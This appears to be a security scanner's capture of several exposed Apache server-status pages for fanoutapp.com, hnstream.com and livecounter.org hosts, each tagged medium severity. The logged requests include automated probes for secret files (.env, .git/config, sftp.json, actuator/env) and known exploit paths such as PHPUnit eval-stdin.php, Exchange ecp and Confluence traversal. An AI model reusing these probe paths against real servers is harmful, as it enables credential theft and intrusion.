140.248.74.24http/1.1api.hnstream.com:8000GET /.docker/laravel/app/.env HTTP/1.1 0-17-0/0/550. 0.0048128344143380.00.001.64 140.248.74.24http/1.1api.hnstream.com:8000GET /config/daemon.json HTTP/1.1 0-17-0/0/558. 0.0048128324854030.00.001.75 140.248.74.24http/1.1api.hnstream.com:8000GET /config/settings.json HTTP/1.1 0-17-0/0/572. 0.0048128345453670.00.001.53 140.248.74.24http/1.1api.hnstream.com:8000GET /private/config.json HTTP/1.1 0-17-0/0/559. 0.0048128318951830.00.001.95 140.248.74.24http/1.1api.hnstream.com:8000GET /manifest.json HTTP/1.1 0-17-0/0/561. 0.0048128321658340.00.001.46 140.248.74.24http/1.1api.hnstream.com:8000GET /config/config.php HTTP/1.1 0-17-0/0/547. 0.004812831249630.00.001.59 140.248.74.24http/1.1api.hnstream.com:8000GET /src/config/environment.json HTTP/1.1 0-17-0/0/548. 0.0048128332048010.00.001.68 140.248.74.24http/1.1api.hnstream.com:8000GET /angular.json HTTP/1.1 0-17-0/0/552. 0.0048128326358840.00.001.76 140.248.74.24http/1.1api.hnstream.com:8000GET /tsconfig.spec.json HTTP/1.1 0-17-0/0/543. 0.0048128347847370.00.001.58 140.248.74.24http/1.1api.hnstream.com:8000GET /config/env.php HTTP/1.1 0-17-0/0/558. 0.004812831155110.00.001.95 104.156.91.26http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2239578410/28/718_ 0.773388460.00.061.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2239578410/22/718_ 0.777363250.00.122.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2239578410/20/708_ 0.775389400.00.051.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-22395784127/29/729W 0.750059830.00.062.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2239578410/24/709_ 0.771366280.00.061.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2239578410/25/728_ 0.771372960.00.052.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2239578410/25/741_ 0.7522349520.00.092.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-2239578410/21/708_ 0.7619354950.00.042.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-2239578410/26/724_ 0.7522364660.00.122.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-2239578410/20/711_ 0.7617351490.00.111.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-2239578410/25/725_ 0.7521360230.00.042.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-2239578410/28/717_ 0.7710359590.00.061.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-2239578410/26/722_ 0.7618348920.00.061.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-2239578410/24/719_ 0.7621351920.00.052.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-2239578410/25/728_ 0.7621367440.00.052.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-2239578410/26/712_ 0.7614357800.00.122.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-2239578410/31/743_ 0.7616361520.00.062.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-2239578410/22/726_ 0.7612365350.00.052.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-2239578410/25/711_ 0.779349160.00.121.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2239578410/21/723_ 0.7711359510.00.041.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-2239578410/30/719_ 0.7611358490.00.071.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-2239578410/25/722_ 0.7613350070.00.062.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-2239578410/31/710_ 0.778357590.00.222.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2239578410/26/749_ 0.7620357630.00.062.10 127.0.0.1htt
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfe02a5f42
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Monday, 01-Dec-2025 12:19:09 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 11 Parent Server MPM Generation: 10 Server uptime: 9 days 14 hours 24 minutes 34 seconds Server load: 0.29 0.18 0.17 Total accesses: 23006 - Total Traffic: 66.9 MB - Total Duration: 174774 CPU Usage: u18.01 s26.26 cu270.97 cs78.15 - .0474% CPU load .0277 requests/sec - 84 B/second - 3049 B/request - 7.59689 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12826014no0yes025000 22826015no1yes124010 Sum201 149010 ........................._______________________________________ ______W____..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7-0/0/309. 0.00217121443470.00.001.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-7-0/0/305. 0.00217121429370.00.001.26 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-7-0/0/286. 0.00217121425620.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-7-0/0/283. 0.00217121426370.00.000.68 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-7-0/0/305. 0.00217121817090.00.001.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-7-0/0/296. 0.00217121320480.00.001.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-7-0/0/291. 0.00217121420080.00.001.10 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-7-0/0/295. 0.00217121716590.00.000.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-7-0/0/301. 0.00217121226730.00.001.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-7-0/0/303. 0.00217121416790.00.001.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-7-0/0/298. 0.00217121730990.00.001.35 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-7-0/0/308. 0.00217121423260.00.001.26 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-7-0/0/295. 0.00217121723810.00.001.09 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-7-0/0/290. 0.00217121324780.00.000.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-7-0/0/292. 0.00217121823070.00.000.99 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-7-0/0/296. 0.00217121415490.00.000.95 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-7-0/0/301. 0.00217121429300.00.000.94 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-7-0/0/310. 0.00217121722720.00.000.75 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-7-0/0/299. 0.00217121719580.00.001.08 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-7-0/0/295. 0.00217121425940.00.000.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-7-0/0/289. 0.00217121722570.00.000.94 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-7-0/0/294. 0.00217121825750.00.001.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-7-0/0/288. 0.00217121620390.00.000.90 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-7-0/0/286. 0.00217121317420.00.000.78 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-7-0/0/292. 0.00217121426180.00.001.11 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-1028260140/21/412_ 0.541344452530.00.050.92 127.0.0.1http/1.1api.hnstream.com:8000GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-1028260140/18/411_ 0.57919134820.00.040.86 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-1028260140/19/423_ 0.571351554560.00.051.13 140.248.75.75http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-1028260140/24/412_ 0.5710051429960.00.050.82 167.82.233.149http/1.1api.livecounter.org:8000POST /counters/4/ HTTP/1.1 1-1028260140/18/408_ 0.58919437440.00.051.38 127.0.0.1http/1.1api.hnstream.com:8000GET /v1 HTTP/1.1 1-1028260140/18/420_ 0.569111239820.00.041.21 157.52.115.35http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-1028260140/24/440_ 0.58917128320.00.051.31 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-1028260140/19/413_ 0.5613492126090.00.051.54 157.52.115.49http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-1028260140/23/421_ 0.5713541525100.00.051.29 104.156.87.89http/1.1api.livecounter.org:8000POST /counters/4/ HTTP/1.1 1-1028260140/23/418_ 0.5713491227180.00.051.22 104.156.87.90http/1.1api.livecounter.org:8000POST /counters/4/ HTTP/1.1 1-1028260140/24/415_ 0.561710536530.00.061.21 104.156.83.69http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-1028260140/18/410_ 0.58916334450.00.121.23 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-1028260140/16/416_ 0.571654124440.00.041.08 104.156.83.36http/1.1api.livecounter.org:8000POST /counters/4 HTTP/1.1 1-1028260140/17/413_ 0.561343724440.00.041.37 157.52.115.25http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-1028260140/19/419_ 0.57920634110.00.051.14 127.0.0.1http/1.1api.hnstream.com:8000GET /version HTTP/1.1 1-1028260140/21/407_ 0.531706327960.00.131.22 127.0.0.1http/1.1api.hnstream.com:8000GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-1028260140/18/421_ 0.5381429000.00.041.29 127.0.0.1http/1.1api.hnstream.com:8000GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-1028260140/18/415_ 0.541000432090.00.041.30 127.0.0.1http/1.1api.hnstream.com:8000GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-1028260140/16/408_ 0.57919124120.00.031.08 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-1028260140/17/423_ 0.551649234100.00.041.25 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-1028260140/21/412_ 0.58918129420.00.051.22 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-1028260140/20/417_ 0.571348424630.00.051.35 140.248.75.75http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-1028260140/19/394_ 0.5986024770.00.041.09 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 1-1028260140/16/423_ 0.561711226520.00.031.32 104.156.83.29http/1.1api.livecounter.org:8000POST /counters/4 HTTP/1.1 1-1028260140/20/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfc548feb6
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 28-Nov-2025 21:07:42 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 8 Parent Server MPM Generation: 7 Server uptime: 6 days 23 hours 13 minutes 7 seconds Server load: 0.29 0.33 0.25 Total accesses: 12820 - Total Traffic: 43.1 MB - Total Duration: 107424 CPU Usage: u14.4 s19.44 cu173.88 cs52.66 - .0433% CPU load .0213 requests/sec - 75 B/second - 3525 B/request - 8.37941 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02538790no0yes025000 12538791no0yes124000 Sum200 149000 ____________________________________W_____________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-725387900/46/303_ 1.532342900.00.211.13 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-725387900/40/297_ 1.532328430.00.241.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-725387900/34/281_ 1.532325130.00.070.72 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-725387900/37/279_ 1.532426280.00.080.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-725387900/43/300_ 1.532316780.00.191.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 0-725387900/36/289_ 1.532320220.00.200.98 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-725387900/38/282_ 1.522319560.00.251.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-725387900/36/286_ 1.523315410.00.170.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-725387900/40/293_ 1.513326270.00.241.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-725387900/40/294_ 1.523316390.00.251.11 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-725387900/41/289_ 1.522330570.00.361.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-725387900/46/299_ 1.522422450.00.231.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-725387900/38/288_ 1.532323140.00.261.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-725387900/37/285_ 1.513324180.00.160.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-725387900/39/282_ 1.513322510.00.110.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-725387900/34/286_ 1.513314280.00.250.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-725387900/39/294_ 1.513428230.00.290.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-725387900/41/299_ 1.523322160.00.110.72 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-725387900/32/291_ 1.523319170.00.191.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-725387900/37/286_ 1.532324970.00.150.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 0-725387900/36/279_ 1.522321640.00.250.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-725387900/38/284_ 1.532324790.00.351.03 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-725387900/33/277_ 1.523319600.00.170.87 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-725387900/40/281_ 1.532417200.00.100.77 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-725387900/37/283_ 1.532225580.00.331.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-725387910/20/222_ 0.873342520.00.030.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-725387910/20/221_ 0.880314290.00.030.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-725387910/19/233_ 0.873345660.00.040.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-725387910/22/220_ 0.872319730.00.030.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-725387910/20/222_ 0.872326330.00.040.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-725387910/24/235_ 0.872325250.00.050.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-725387910/25/234_ 0.880317960.00.200.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-725387910/20/221_ 0.880315280.00.040.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-725387910/22/225_ 0.880314510.00.150.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-725387910/26/225_ 0.880316040.00.100.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-725387910/21/226_ 0.890325300.00.040.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-7253879127/21/222W 0.860021250.00.070.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-725387910/20/229_ 0.873314920.00.110.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-725387910/25/232_ 0.882314550.00.210.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-725387910/19/220_ 0.872319030.00.060.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-725387910/19/222_ 0.882313200.00.030.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-725387910/21/232_ 0.882317340.00.070.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-725387910/24/227_ 0.881324080.00.210.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-725387910/19/218_ 0.882312730.00.200.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-725387910/22/232_ 0.881318390.00.160.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-725387910/25/218_ 0.881313720.00.150.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-725387910/25/225_ 0.881312540.00.080.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-725387910/21/212_ 0.881316240.00.100.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-725387910/21/236_ 0.880317020.00.05<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf5bfb9203
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 26-Nov-2025 18:35:52 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 6 Parent Server MPM Generation: 5 Server uptime: 4 days 20 hours 41 minutes 17 seconds Server load: 0.32 0.26 0.20 Total accesses: 9814 - Total Traffic: 30.7 MB - Total Duration: 79525 CPU Usage: u10.05 s13.76 cu119.76 cs36.45 - .0429% CPU load .0234 requests/sec - 76 B/second - 3284 B/request - 8.10322 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02352689no0yes025000 12352691no2yes124010 Sum202 149010 ___________________________________W______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-523526890/19/222_ 0.645576330780.00.040.70 140.248.68.85http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-523526890/23/219_ 0.6519936316350.00.130.92 140.248.83.55http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-523526890/20/214_ 0.645880622810.00.030.48 127.0.0.1http/1.1api.hnstream.com:8000GET //ip-api.com/json/ HTTP/1.1 0-523526890/19/207_ 0.483036414920.00.110.52 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env.example HTTP/1.1 0-523526890/23/221_ 0.5958757411250.00.040.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-523526890/24/218_ 0.653041012760.00.120.63 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/ HTTP/1.1 0-523526890/22/210_ 0.653041016030.00.050.67 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-523526890/23/215_ 0.6676011530.00.050.62 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-523526890/20/220_ 0.5032473520410.00.030.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-523526890/24/221_ 0.643981111210.00.130.69 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-523526890/21/211_ 0.5971124390.00.040.71 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-523526890/21/217_ 0.5955713417510.00.110.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-523526890/18/216_ 0.506541317930.00.040.71 127.0.0.1http/1.1api.hnstream.com:8000GET /server/.env.pem HTTP/1.1 0-523526890/18/209_ 0.484394419900.00.030.68 118.193.61.179http/1.1 0-523526890/19/210_ 0.596541317760.00.030.70 157.52.104.31http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-523526890/23/213_ 0.6443943511750.00.040.60 94.231.206.4http/1.1api.hnstream.com:8000\x16\x03\x03\x01\xa6\x01 0-523526890/22/215_ 0.6519922314350.00.050.54 140.248.83.25http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-523526890/19/223_ 0.483976317740.00.030.53 127.0.0.1http/1.1api.hnstream.com:8000GET /test/.env.admin HTTP/1.1 0-523526890/22/225_ 0.6613613614100.00.050.69 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-523526890/22/212_ 0.5519872319160.00.130.67 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 0-523526890/19/210_ 0.6532523717340.00.100.49 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-523526890/20/215_ 0.6676020520.00.040.61 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-523526890/24/216_ 0.571356814410.00.110.65 167.82.233.138http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-523526890/23/209_ 0.631988911300.00.070.61 35.90.111.210http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-523526890/25/215_ 0.64433113500.00.070.70 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 1-523526910/34/179_ 1.086332180.00.070.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-523526910/26/174_ 1.084310810.00.050.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-523526910/36/186_ 1.083336960.00.100.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-523526910/28/172_ 1.085311430.00.050.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-523526910/29/176_ 1.082323870.00.080.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-523526910/35/185_ 1.062322710.00.150.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-523526910/35/178_ 1.0710313680.00.160.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-523526910/30/178_ 1.079312730.00.060.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-523526910/28/179_ 1.077311880.00.090.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-523526910/35/172_ 1.087211950.00.300.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-5235269126/32/177W 1.060014580.00.230.55 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-523526910/29/176_ 1.0710311810.00.150.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-523526910/37/185_ 1.08238860.00.100.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-523526910/33/182_ 1.08139350.00.150.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-523526910/30/173_ 1.078315410.00.050.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-523526910/33/177_ 1.080310690.00.200.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-523526910/33/188_ 1.071139020.00.080.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-523526910/33/176_ 1.078320910.00.060.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-523526910/28/176_ 1.062310810.00.070.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-523526910/31/181_ 1.086315100.00.080.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-523526910/30/164_ 1.061139300.00.080.38 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 1-523526910/35/179_ 1.0711310170.00.140.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-523526910/30/169_ 1.078312670.00.070.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-523526910/31/189_ 1.079313940.00.210.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-523526910/25/160_ 1.0710414480.00.150.53 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf695782e5
